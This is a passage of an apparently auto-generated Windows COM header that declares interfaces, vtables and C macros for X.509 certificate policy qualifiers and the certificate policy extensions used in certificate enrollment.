    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IPolicyQualifier_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IPolicyQualifier_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IPolicyQualifier_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IPolicyQualifier_InitializeEncode(This,strQualifier,Type)	\
    ( (This)->lpVtbl -> InitializeEncode(This,strQualifier,Type) ) 

#define IPolicyQualifier_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IPolicyQualifier_get_Qualifier(This,pValue)	\
    ( (This)->lpVtbl -> get_Qualifier(This,pValue) ) 

#define IPolicyQualifier_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IPolicyQualifier_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IPolicyQualifier_INTERFACE_DEFINED__ */


#ifndef __IPolicyQualifiers_INTERFACE_DEFINED__
#define __IPolicyQualifiers_INTERFACE_DEFINED__

/* interface IPolicyQualifiers */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IPolicyQualifiers;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31d-217d-11da-b2a4-000e7bbb2b09")
    IPolicyQualifiers : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IPolicyQualifier **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IPolicyQualifier *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IPolicyQualifiersVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IPolicyQualifiers * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IPolicyQualifiers * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IPolicyQualifiers * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IPolicyQualifiers * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IPolicyQualifier **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IPolicyQualifiers * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IPolicyQualifiers * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ __RPC__in_opt IPolicyQualifier *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IPolicyQualifiers * This);
        
        END_INTERFACE
    } IPolicyQualifiersVtbl;

    interface IPolicyQualifiers
    {
        CONST_VTBL struct IPolicyQualifiersVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IPolicyQualifiers_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IPolicyQualifiers_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IPolicyQualifiers_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IPolicyQualifiers_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IPolicyQualifiers_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IPolicyQualifiers_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IPolicyQualifiers_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IPolicyQualifiers_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IPolicyQualifiers_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IPolicyQualifiers_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IPolicyQualifiers_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IPolicyQualifiers_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IPolicyQualifiers_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IPolicyQualifiers_INTERFACE_DEFINED__ */


#ifndef __ICertificatePolicy_INTERFACE_DEFINED__
#define __ICertificatePolicy_INTERFACE_DEFINED__

/* interface ICertificatePolicy */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificatePolicy;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31e-217d-11da-b2a4-000e7bbb2b09")
    ICertificatePolicy : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyQualifiers( 
            /* [retval][out] */ __RPC__deref_out_opt IPolicyQualifiers **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertificatePolicyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificatePolicy * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificatePolicy * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificatePolicy * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificatePolicy * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificatePolicy * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificatePolicy * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificatePolicy * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertificatePolicy * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in ICertificatePolicy * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyQualifiers )( 
            __RPC__in ICertificatePolicy * This,
            /* [retval][out] */ __RPC__deref_out_opt IPolicyQualifiers **ppValue);
        
        END_INTERFACE
    } ICertificatePolicyVtbl;

    interface ICertificatePolicy
    {
        CONST_VTBL struct ICertificatePolicyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificatePolicy_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificatePolicy_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificatePolicy_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificatePolicy_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificatePolicy_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificatePolicy_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificatePolicy_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificatePolicy_Initialize(This,pValue)	\
    ( (This)->lpVtbl -> Initialize(This,pValue) ) 

#define ICertificatePolicy_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define ICertificatePolicy_get_PolicyQualifiers(This,ppValue)	\
    ( (This)->lpVtbl -> get_PolicyQualifiers(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificatePolicy_INTERFACE_DEFINED__ */


#ifndef __ICertificatePolicies_INTERFACE_DEFINED__
#define __ICertificatePolicies_INTERFACE_DEFINED__

/* interface ICertificatePolicies */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificatePolicies;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31f-217d-11da-b2a4-000e7bbb2b09")
    ICertificatePolicies : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicy **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICertificatePolicy *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertificatePoliciesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificatePolicies * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificatePolicies * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificatePolicies * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificatePolicies * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicy **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICertificatePolicies * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICertificatePolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ __RPC__in_opt ICertificatePolicy *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICertificatePolicies * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICertificatePolicies * This);
        
        END_INTERFACE
    } ICertificatePoliciesVtbl;

    interface ICertificatePolicies
    {
        CONST_VTBL struct ICertificatePoliciesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificatePolicies_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificatePolicies_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificatePolicies_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificatePolicies_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificatePolicies_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificatePolicies_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificatePolicies_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificatePolicies_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICertificatePolicies_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICertificatePolicies_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICertificatePolicies_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICertificatePolicies_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICertificatePolicies_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificatePolicies_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionCertificatePolicies_INTERFACE_DEFINED__
#define __IX509ExtensionCertificatePolicies_INTERFACE_DEFINED__

/* interface IX509ExtensionCertificatePolicies */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionCertificatePolicies;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab320-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionCertificatePolicies : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt ICertificatePolicies *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Policies( 
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicies **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionCertificatePoliciesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionCertificatePolicies * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionCertificatePolicies * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionCertificatePolicies * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ __RPC__in_opt ICertificatePolicies *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Policies )( 
            __RPC__in IX509ExtensionCertificatePolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicies **ppValue);
        
        END_INTERFACE
    } IX509ExtensionCertificatePoliciesVtbl;

    interface IX509ExtensionCertificatePolicies
    {
        CONST_VTBL struct IX509ExtensionCertificatePoliciesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionCertificatePolicies_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionCertificatePolicies_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionCertificatePolicies_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionCertificatePolicies_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionCertificatePolicies_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionCertificatePolicies_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionCertificatePolicies_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionCertificatePolicies_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionCertificatePolicies_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionCertificatePolicies_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionCertificatePolicies_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionCertificatePolicies_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionCertificatePolicies_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionCertificatePolicies_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionCertificatePolicies_get_Policies(This,ppValue)	\
    ( (This)->lpVtbl -> get_Policies(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionCertificatePolicies_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionMSApplicationPolicies_INTERFACE_DEFINED__
#define __IX509ExtensionMSApplicationPolicies_INTERFACE_DEFINED__

/* interface IX509ExtensionMSApplicationPolicies */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionMSApplicationPolicies;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab321-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionMSApplicationPolicies : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt ICertificatePolicies *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Policies( 
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicies **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionMSApplicationPoliciesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [in] */ __RPC__in REFIID riid,
